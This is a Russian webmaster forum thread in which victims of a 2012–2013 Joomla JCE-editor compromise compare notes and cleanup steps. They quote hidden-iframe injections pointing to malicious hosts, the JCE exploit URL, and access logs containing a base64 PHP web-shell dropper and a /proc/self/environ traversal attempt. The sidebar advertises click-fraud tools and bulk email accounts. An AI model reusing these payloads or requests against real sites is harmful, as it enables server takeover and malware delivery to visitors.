Проблемы с сайтом, внедрены вредоностные коды на сайте
Страницы: Пред. 1 2 3 4 5
Проблемы с сайтом, внедрены вредоностные коды на сайте
web-masteru.ogkuipt.ru/bezopasnost-sajta/vosstanovlenie-sajta/17-vosstanovlenie-sajta-posle-zarazheniya-vredonosnym-kodomпопробуй с этого сайта скачать скрипт, может тот не рабочий. я здесь качала ( в самом низу "Современный метод") у меня без ошибок находил.
так зачем качать скрипт если вы его скачали так скиньте его сюда..
людей не ведитесь сами подумайте если человек скачал скрипт то он может их выложить сюда... просто реклама... вирус там...
со скриптом разобрался...все поудалял
есть еще одно, теперь раз в полчаса наблюдаю такую картину в логах



213.171.204.130 - - [24/Dec/2012:00:41:17 +0400] "GET /administrator/ HTTP/1.0" 303 - "-" "9my6NnYWKgtu"
213.171.204.130 - - [24/Dec/2012:00:41:18 +0400] "POST /administrator/ HTTP/1.0" 200 13 "-" "9my6NnYWKgtu"


пытаются в админку залезть ? админку скрыл через кодовое слово...
знатоки объясните ?
Была проблема, началась именно 19 декабря. В-общем, вроде решил. Рассказываю.
Заражение происходит через JCE старой версии. В логах веб-сервера строка index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a6081f4fe1f5ac65c1246b5f=9d09f693c63c1960a9f8a564e0da7743. Как потом прочитал на каком то форуме, у людей было аналогичное заражение. Получается, что внедряется код на сайт через уязвимость в JCE.
Решение - обновить JCE (я нашёл и скачал версию 2.3.1 и даже с русификатором).
По поводу заражённых сайтов:
1. Если есть бекап - восстановить из него.
2. Если нет бэкапа - я не стал мучаться с удалением из файлов js вредоносных вставок iframe, а просто перезалил сами js-файлы (их можно взять из соответствующего дистрибутива Джумлы). Кроме того, надо обязательно удалить ВСЕ php файлы из директории images и вложенных в неё (если только там нету Ваших php-файлов, которые Вы непонятно зачем разместили в папке images).
После восстановления сайта, как я уже писал выше - обновить JCE
JustHost начал регистрировать вирусы вчера. Сообщение моего хостера (переведено):


Цитата

Уважаемый клиент,

Это уведомление сообщить вам, что мы обнаружили вредоносный код в файлы веб-сайта. Мы составили список зараженных файлов на вашем счету, а также вводится код ниже.

Для того, чтобы поддерживать безопасную среду размещения, мы будем автоматически корректируя эти скомпрометированы файлы на вашем счете, однако, следует помнить, что вы несете ответственность за проверку контента, размещенного в своем аккаунте в безопасности. Мы настоятельно рекомендуем вам обновить установленные скрипты и программного обеспечения, как устаревшие скриптов и программного обеспечения является наиболее часто используемым методом для доступа и получить контроль над целевой счет.

Если вам нужна помощь обновлению программного обеспечения на ваш хостинг аккаунт, пожалуйста, не стесняйтесь связаться с нашей службой поддержки.

JustHost.com поддержки
www.justhost.com
Служба поддержки: helpdesk.justhost.com/
Toll-Free: (888) 755-7585

Скомпрометирована файлы, обнаруженные являются:

/ home/ххх/public_html/ххх.ru/images/stories/.cache_tl8zas.php
/ home/ххх/public_html/хххn.ru/images/stories/story.php


Вредоносный код обнаружен похож на:

Перенаправление к следующей ссылке пример:

document.write ('<iframe src="activexscrutiny.org/Lexmark?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> </ IFRAME> ');

Хотя мы можем обнаружить и удалить эти компромиссы, это не обезопасить от дальнейших попыток взлома через тот же метод. Данный эксплойт по-видимому, связано с устаревшими версиями редактора JCE Joomla. Мы настоятельно рекомендуем обновить все экземпляры Joomla на ваш счет с последней версией редактора JCE, найти здесь:

extensions.joomla.org/extensions/edition/editors/88


С уважением,

JustHost Администраторы




[URL]Отменить изменения[/URL]





Остался не зараженным 1 сайт на Joomla Версия 1.5.15 (без JCE) - это не понятно. У меня заражены Joomla, как 1.5.26 (с JCE и без неё) и более ранние, так и  2.5.4. Ну да фиг с ними, т.к. вирус распространился на 1 статический HTML сайт, который не использует БД и CMS, но много JS.
Сайт на WordPress раздулся в три раза больше - видимо вирус плодится.
Сижу ничего не делаю - не могу никак начать - страшно, много работы!
Похоже некоторые справляются.
Читал, что:
-  могут быть изменены  файлы для заражения в будущем.
- могут быть  украдены пароли.
Значит нужно по любому восстанавливать из бэкапов до 19 дек?
Интересно, распространяется ли зараза на саму CPanel?
Интересно, какие пароли ворует вирус?
Я удалил php файлы с вирусами, и восстановил полный бекап хостера.
Удалил JCE.
Сайтов порядка 15 штук, чистить все эти JS нужно было бы очень долго.

Сейчас настраиваю VPS, что бы там разделить сайты промеж себя, что бы в дальнейшем при взломе одного сайта другие не страдали.
У меня заражение произошло чуть позже 25 декабря. Первое что сделал: откат файлов, удалил JCE, поменял все пароли в том числе и имя базы и пароль к ней, установил jce 2.3.1. Спустя несколько дней ситуация повторилась, тот же вирус. Опять же восстановил файлы, и еще раз удалил JCE 2.3.1, пока заражения не было. Сейчас боюсь устанавливать JCE...
Изменено: Игорь Брянцев - 9 Января 2013 12:29
во все js файлы была добавлена строка
Код
;document.write('<iframe style="position:fixed;left:-500px;top:0px;" height="130" width="130" src="dokmejpc.lflinkup.net/72ae68a8c2b905e9b248cfb.VtT0jL53H?default"></iframe>');
перезалил сайт из копии, посмотрел логи вот что увидел:
Код
93.115.84.155 - - [14/Feb/2013:11:55:02 +0400] "GET / HTTP/1.0" 200 29343 "" "<?php eval(base64_decode(\"QGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsIDEpOw0KDQphZGRMb2FkZXIoKTsNCiRkYXRhID0gQG9wZW5kaXIoJy4nKTsNCg0Kd2hpbGUgKCRmaWxlID0gQHJlYWRkaXIoJGRhdGEpKQ0Kew0KCSRmaWxlID0gdHJpbSgkZmlsZSk7DQoJaWYgKCEkZmlsZSB8fCBwcmVnX21hdGNoKCcvXlwuKyQvJywgJGZpbGUpIHx8ICFpc19kaXIoJGZpbGUpKSBjb250aW51ZTsNCglhZGRMb2FkZXIoJGZpbGUpOw0KfQ0KDQpAY2xvc2VkaXIoJGRhdGEpOw0KDQpmdW5jdGlvbiBhZGRMb2FkZXIoJGRpciA9ICcnKQ0Kew0KICAgIGlmICgkZGlyKSAkZGlyIC49ICcvJzsNCiAgICBAY2htb2QoJGRpciwgNzc3KTsNCiAgICBAc3lzdGVtKCJjaG1vZCA3NzcgJGRpciIpOw0KICAgIA0KICAgICRmcCA9IGZvcGVuKCJ7JGRpcn0xMzM2MWRjZTQwOWM1YjU3ZGI3OTRlZmRhYjJjMWU4OC5waHAiLCAidyIpOyANCiAgICBmd3JpdGUoJGZwLCBiYXNlNjRfZGVjb2RlKCdQRDl3YUhBTkNnMEtRR2x1YVY5elpYUW9KMkZzYkc5M1gzVnliRjltYjNCbGJpY3NJREVwT3cwS1FHbHVhVjl6WlhRb0oyUmxabUYxYkhSZmMyOWphMlYwWDNScGJXVnZkWFFuTENBMk1DazdEUXBBYVc1cFgzTmxkQ2duYldGNFgyVjRaV04xZEdsdmJsOTBhVzFsSnl3Z05qQXBPdzBLUUhObGRGOTBhVzFsWDJ4cGJXbDBLRFl3S1RzTkNnMEtKR1JoZEdFZ1BTQkFkVzV6WlhKcFlXeHBlbVVvWW1GelpUWTBYMlJsWTI5a1pTaDBjbWx0S0VBa1gxQlBVMVJiSjJSaGRHRW5YU2twS1RzTkNnMEthV1lnS0VBaGFYTmZZWEp5WVhrb0pHUmhkR0VwSUh4OElHMWtOU2drWkdGMFlWc25jR0Z6YzNkdmNtUW5YU2tnSVQwZ0oyUXpaR1kwTXpsak0yVTBZakpqTkRFNU1qQmtPR1V5TnpNek1URXpNak0ySnlrZ1pYaHBkRHNOQ21sbUlDaEFKR1JoZEdGYkoyTnZaR1VuWFNrZ1pYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtDUmtZWFJoV3lkamIyUmxKMTBwS1RzTkNtbG1JQ2hBSkdSaGRHRmJKMk5vWldOclgyTnZaR1VuWFNrZ2NISnBiblFnSkdSaGRHRmJKMk5vWldOclgyTnZaR1VuWFRzTkNnMEtQejQ9JykpOw0KCWZjbG9zZSgkZnApOw0KDQoJaWYgKGZpbGVfZXhpc3RzKCJ7JGRpcn0xMzM2MWRjZTQwOWM1YjU3ZGI3OTRlZmRhYjJjMWU4OC5waHAiKSkNCgl7DQogICAgICAgICRjayA9ICIxODIzNjQ5MzY1ODIwMzU0IjsNCgkgICAgcHJpbnQgIiRjazp7Kn06JGRpcjp7Kn06IjsNCgkJZXhpdDsNCgl9DQp9\")); ?>"

Код
93.115.84.155 - - [14/Feb/2013:11:55:03 +0400] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../proc/self/environ HTTP/1.0" 404 1844 "" "<?php eval(base64_decode(\"QGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsIDEpOw0KDQphZGRMb2FkZXIoKTsNCiRkYXRhID0gQG9wZW5kaXIoJy4nKTsNCg0Kd2hpbGUgKCRmaWxlID0gQHJlYWRkaXIoJGRhdGEpKQ0Kew0KCSRmaWxlID0gdHJpbSgkZmlsZSk7DQoJaWYgKCEkZmlsZSB8fCBwcmVnX21hdGNoKCcvXlwuKyQvJywgJGZpbGUpIHx8ICFpc19kaXIoJGZpbGUpKSBjb250aW51ZTsNCglhZGRMb2FkZXIoJGZpbGUpOw0KfQ0KDQpAY2xvc2VkaXIoJGRhdGEpOw0KDQpmdW5jdGlvbiBhZGRMb2FkZXIoJGRpciA9ICcnKQ0Kew0KICAgIGlmICgkZGlyKSAkZGlyIC49ICcvJzsNCiAgICBAY2htb2QoJGRpciwgNzc3KTsNCiAgICBAc3lzdGVtKCJjaG1vZCA3NzcgJGRpciIpOw0KICAgIA0KICAgICRmcCA9IGZvcGVuKCJ7JGRpcn0xMzM2MWRjZTQwOWM1YjU3ZGI3OTRlZmRhYjJjMWU4OC5waHAiLCAidyIpOyANCiAgICBmd3JpdGUoJGZwLCBiYXNlNjRfZGVjb2RlKCdQRDl3YUhBTkNnMEtRR2x1YVY5elpYUW9KMkZzYkc5M1gzVnliRjltYjNCbGJpY3NJREVwT3cwS1FHbHVhVjl6WlhRb0oyUmxabUYxYkhSZmMyOWphMlYwWDNScGJXVnZkWFFuTENBMk1DazdEUXBBYVc1cFgzTmxkQ2duYldGNFgyVjRaV04xZEdsdmJsOTBhVzFsSnl3Z05qQXBPdzBLUUhObGRGOTBhVzFsWDJ4cGJXbDBLRFl3S1RzTkNnMEtKR1JoZEdFZ1BTQkFkVzV6WlhKcFlXeHBlbVVvWW1GelpUWTBYMlJsWTI5a1pTaDBjbWx0S0VBa1gxQlBVMVJiSjJSaGRHRW5YU2twS1RzTkNnMEthV1lnS0VBaGFYTmZZWEp5WVhrb0pHUmhkR0VwSUh4OElHMWtOU2drWkdGMFlWc25jR0Z6YzNkdmNtUW5YU2tnSVQwZ0oyUXpaR1kwTXpsak0yVTBZakpqTkRFNU1qQmtPR1V5TnpNek1URXpNak0ySnlrZ1pYaHBkRHNOQ21sbUlDaEFKR1JoZEdGYkoyTnZaR1VuWFNrZ1pYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtDUmtZWFJoV3lkamIyUmxKMTBwS1RzTkNtbG1JQ2hBSkdSaGRHRmJKMk5vWldOclgyTnZaR1VuWFNrZ2NISnBiblFnSkdSaGRHRmJKMk5vWldOclgyTnZaR1VuWFRzTkNnMEtQejQ9JykpOw0KCWZjbG9zZSgkZnApOw0KDQoJaWYgKGZpbGVfZXhpc3RzKCJ7JGRpcn0xMzM2MWRjZTQwOWM1YjU3ZGI3OTRlZmRhYjJjMWU4OC5waHAiKSkNCgl7DQogICAgICAgICRjayA9ICIxODIzNjQ5MzY1ODIwMzU0IjsNCgkgICAgcHJpbnQgIiRjazp7Kn06JGRpcjp7Kn06IjsNCgkJZXhpdDsNCgl9DQp9\")); ?>"

Код
93.115.84.155 - - [14/Feb/2013:11:55:04 +0400] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 1844 "" "<?php eval(base64_decode(\"QGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsIDEpOw0KDQphZGRMb2FkZXIoKTsNCiRkYXRhID0gQG9wZW5kaXIoJy4nKTsNCg0Kd2hpbGUgKCRmaWxlID0gQHJlYWRkaXIoJGRhdGEpKQ0Kew0KCSRmaWxlID0gdHJpbSgkZmlsZSk7DQoJaWYgKCEkZmlsZSB8fCBwcmVnX21hdGNoKCcvXlwuKyQvJywgJGZpbGUpIHx8ICFpc19kaXIoJGZpbGUpKSBjb250aW51ZTsNCglhZGRMb2FkZXIoJGZpbGUpOw0KfQ0KDQpAY2xvc2VkaXIoJGRhdGEpOw0KDQpmdW5jdGlvbiBhZGRMb2FkZXIoJGRpciA9ICcnKQ0Kew0KICAgIGlmICgkZGlyKSAkZGlyIC49ICcvJzsNCiAgICBAY2htb2QoJGRpciwgNzc3KTsNCiAgICBAc3lzdGVtKCJjaG1vZCA3NzcgJGRpciIpOw0KICAgIA0KICAgICRmcCA9IGZvcGVuKCJ7JGRpcn0xMzM2MWRjZTQwOWM1YjU3ZGI3OTRlZmRhYjJjMWU4OC5waHAiLCAidyIpOyANCiAgICBmd3JpdGUoJGZwLCBiYXNlNjRfZGVjb2RlKCdQRDl3YUhBTkNnMEtRR2x1YVY5elpYUW9KMkZzYkc5M1gzVnliRjltYjNCbGJpY3NJREVwT3cwS1FHbHVhVjl6WlhRb0oyUmxabUYxYkhSZmMyOWphMlYwWDNScGJXVnZkWFFuTENBMk1DazdEUXBBYVc1cFgzTmxkQ2duYldGNFgyVjRaV04xZEdsdmJsOTBhVzFsSnl3Z05qQXBPdzBLUUhObGRGOTBhVzFsWDJ4cGJXbDBLRFl3S1RzTkNnMEtKR1JoZEdFZ1BTQkFkVzV6WlhKcFlXeHBlbVVvWW1GelpUWTBYMlJsWTI5a1pTaDBjbWx0S0VBa1gxQlBVMVJiSjJSaGRHRW5YU2twS1RzTkNnMEthV1lnS0VBaGFYTmZZWEp5WVhrb0pHUmhkR0VwSUh4OElHMWtOU2drWkdGMFlWc25jR0Z6YzNkdmNtUW5YU2tnSVQwZ0oyUXpaR1kwTXpsak0yVTBZakpqTkRFNU1qQmtPR1V5TnpNek1URXpNak0ySnlrZ1pYaHBkRHNOQ21sbUlDaEFKR1JoZEdGYkoyTnZaR1VuWFNrZ1pYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtDUmtZWFJoV3lkamIyUmxKMTBwS1RzTkNtbG1JQ2hBSkdSaGRHRmJKMk5vWldOclgyTnZaR1VuWFNrZ2NISnBiblFnSkdSaGRHRmJKMk5vWldOclgyTnZaR1VuWFRzTkNnMEtQejQ9JykpOw0KCWZjbG9zZSgkZnApOw0KDQoJaWYgKGZpbGVfZXhpc3RzKCJ7JGRpcn0xMzM2MWRjZTQwOWM1YjU3ZGI3OTRlZmRhYjJjMWU4OC5waHAiKSkNCgl7DQogICAgICAgICRjayA9ICIxODIzNjQ5MzY1ODIwMzU0IjsNCgkgICAgcHJpbnQgIiRjazp7Kn06JGRpcjp7Kn06IjsNCgkJZXhpdDsNCgl9DQp9\")); ?>"

Код

и т.д там много было с этого ip, в .htaccess поставил запрет на него. может кто что посоветует еще надо сделать?
была такая байда.1. Выкачал все через фтп
2. Скачал эту программку http://www.interestprograms.ru/programs/applications/easyreplacetext.html
3. вставил 
----

eval(base64_decode(\"QGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsIDEpOw0KDQphZGRMb2FkZXIoKTsNCiRkYXRhID0gQG9wZW5kaXIoJy4nKTsNCg0Kd2hpbGUgKCRmaWxlID0gQHJlYWRkaXIoJGRhdGEpKQ0Kew0KCSRmaWxlID0gdHJpbSgkZmlsZSk7DQoJaWYgKCEkZmlsZSB8fCBwcmVnX21hdGNoKCcvXlwuKyQvJywgJGZpbGUpIHx8ICFpc19kaXIoJGZpbGUpKSBjb250aW51ZTsNCglhZGRMb2FkZXIoJGZpbGUpOw0KfQ0KDQpAY2xvc2VkaXIoJGRhdGEpOw0KDQpmdW5jdGlvbiBhZGRMb2FkZXIoJGRpciA9ICcnKQ0Kew0KICAgIGlmICgkZGlyKSAkZGlyIC49ICcvJzsNCiAgICBAY2htb2QoJGRpciwgNzc3KTsNCiAgICBAc3lzdGVtKCJjaG1vZCA3NzcgJGRpciIpOw0KICAgIA0KICAgICRmcCA9IGZvcGVuKCJ7JGRpcn0xMzM2MWRjZTQwOWM1YjU3ZGI3OTRlZmRhYjJjMWU4OC5waHAiLCAidyIpOyANCiAgICBmd3JpdGUoJGZwLCBiYXNlNjRfZGVjb2RlKCdQRDl3YUhBTkNnMEtRR2x1YVY5elpYUW9KMkZzYkc5M1gzVnliRjltYjNCbGJpY3NJREVwT3cwS1FHbHVhVjl6WlhRb0oyUmxabUYxYkhSZmMyOWphMlYwWDNScGJXVnZkWFFuTENBMk1DazdEUXBBYVc1cFgzTmxkQ2duYldGNFgyVjRaV04xZEdsdmJsOTBhVzFsSnl3Z05qQXBPdzBLUUhObGRGOTBhVzFsWDJ4cGJXbDBLRFl3S1RzTkNnMEtKR1JoZEdFZ1BTQkFkVzV6WlhKcFlXeHBlbVVvWW1GelpUWTBYMlJsWTI5a1pTaDBjbWx0S0VBa1gxQlBVMVJiSjJSaGRHRW5YU2twS1RzTkNnMEthV1lnS0VBaGFYTmZZWEp5WVhrb0pHUmhkR0VwSUh4OElHMWtOU2drWkdGMFlWc25jR0Z6YzNkdmNtUW5YU2tnSVQwZ0oyUXpaR1kwTXpsak0yVTBZakpqTkRFNU1qQmtPR1V5TnpNek1URXpNak0ySnlrZ1pYaHBkRHNOQ21sbUlDaEFKR1JoZEdGYkoyTnZaR1VuWFNrZ1pYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtDUmtZWFJoV3lkamIyUmxKMTBwS1RzTkNtbG1JQ2hBSkdSaGRHRmJKMk5vWldOclgyTnZaR1VuWFNrZ2NISnBiblFnSkdSaGRHRmJKMk5vWldOclgyTnZaR1VuWFRzTkNnMEtQejQ9JykpOw0KCWZjbG9zZSgkZnApOw0KDQoJaWYgKGZpbGVfZXhpc3RzKCJ7JGRpcn0xMzM2MWRjZTQwOWM1YjU3ZGI3OTRlZmRhYjJjMWU4OC5waHAiKSkNCgl7DQogICAgICAgICRjayA9ICIxODIzNjQ5MzY1ODIwMzU0IjsNCgkgICAgcHJpbnQgIiRjazp7Kn06JGRpcjp7Kn06IjsNCgkJZXhpdDsNCgl9DQp9\")); ?>"


------Заменить на пустоту во всех файлах.
----
4. Залил обратно чистые файлы.
Три месяца уже никаких проблем.
Говорят айболит от такой байды хорошо помогает, но у меня не хватило знаний его настроить:(
Коттеджи в Новосибирске
Бесплатные сайты для представителей Эйвон, Орифлейм, Фаберлик и других МЛМ-компаний
Тоже наблюдаю периодически такое, в папке images/stories появляются то .php то .txt файлы. Как я понял они лезут через редактор (сегодня попробовал в самом редакторе  сделать такое: размер для загрузки файлов поставил 0) кто что думает поможет или нет?smile:confused:
Изменено: Bald - 19 Февраля 2013 17:33
Может кто посоветует...Похожая проблема.Сайт на ДЛЕ.
Началось примерно месяц назад.Яндекс прислал письмо о вред.коде на сайте.
Все пересмотрели,что-то удалили, заменили jquaery,через пару дней Яндекс написал,что все ОК,кода нет...
Через 2 дня--опять,что вред.код! Тут в супре я посмотрел все сайты на этом хостинге--через одного --вредоносный код. Я написал хостеру--он мне прислал отчет-проверка сервера-все ок!
Через пару дней опять--вредоносный код на сайте!  Потом через 2 часа!!!---Яндекс пишет,что все ок,вредоносного кода нет, а выглядел он так-то и так-то..Но никаких ,естественно работ на сайте мы не производили.....Ничего не делали....
Так меня это уже все достало,вот уже Яндекс раз 10-тый присылает ,то есть код,то нету. Может кто поможет разобраться
andrey p.s,  зайдите на оф. сайт и скачайте заплатки для движка, плюс темы по интернету есть какие файлы надо проверять при заражении.
Цитата
Scorpion71 пишет:
andrey p.s, зайдите на оф. сайт и скачайте заплатки для движка, плюс темы по интернету есть какие файлы надо проверять при заражении.
Если вирус есть,я так понимаю,он постоянно, чего Яндекс раз 10 пишет,то есть вирус,то нету?
Страницы: Пред. 1 2 3 4 5
Похожие темы:
Читают тему (гостей: 2, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
21:49 Как правильно покупать ссылки для поддомена? 
18:51 Роскомнадзор отказал в регистрации трети блогеров-десятитысячников 
12:53 где много готовых фавиконок 
22:59 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
12:32 «Хлебные крошки» в адресе сайтов исчезнут из результатов поиска Google 
23:27 Adfinity - Ваш надежный партнер в монетизации трафика 
16:55 Инструменты для массового постинга в WordPress 
01:53 Европейский эквайринг 
20:19 GoogleWalker - устранение конкурентов в Google Ads | Автоматизированная система склика | АНТИБАН 
16:39 Продам аккаунты Gmail USA IP | Gmail MIX IP | Outlook Old 
11:07 Мобильные и Резидентные Прокси Для Соц Сетей | 3 Гб Бесплатно 
11:01 Защитим твой ресурс от блокировки Роскомнадзора 
10:09 BestChange – обменивать электронную валюту можно быстро и выгодно 
06:50 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 
23:52 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди 
07:48 США готовят закон для уничтожения пиратских сайтов во всех странах мира 
02:50 Точные прогнозы на футбол 
02:10 [Новая партнерка] Goldbet Partners — прямой рекламодатель одноименного казино Goldbet 
21:19 С юмором по жизни! 
18:15 Telegram уничтожил официальный канал легендарного российского торрент-трекера 
18:19 Уникальный сервис SEO продвижения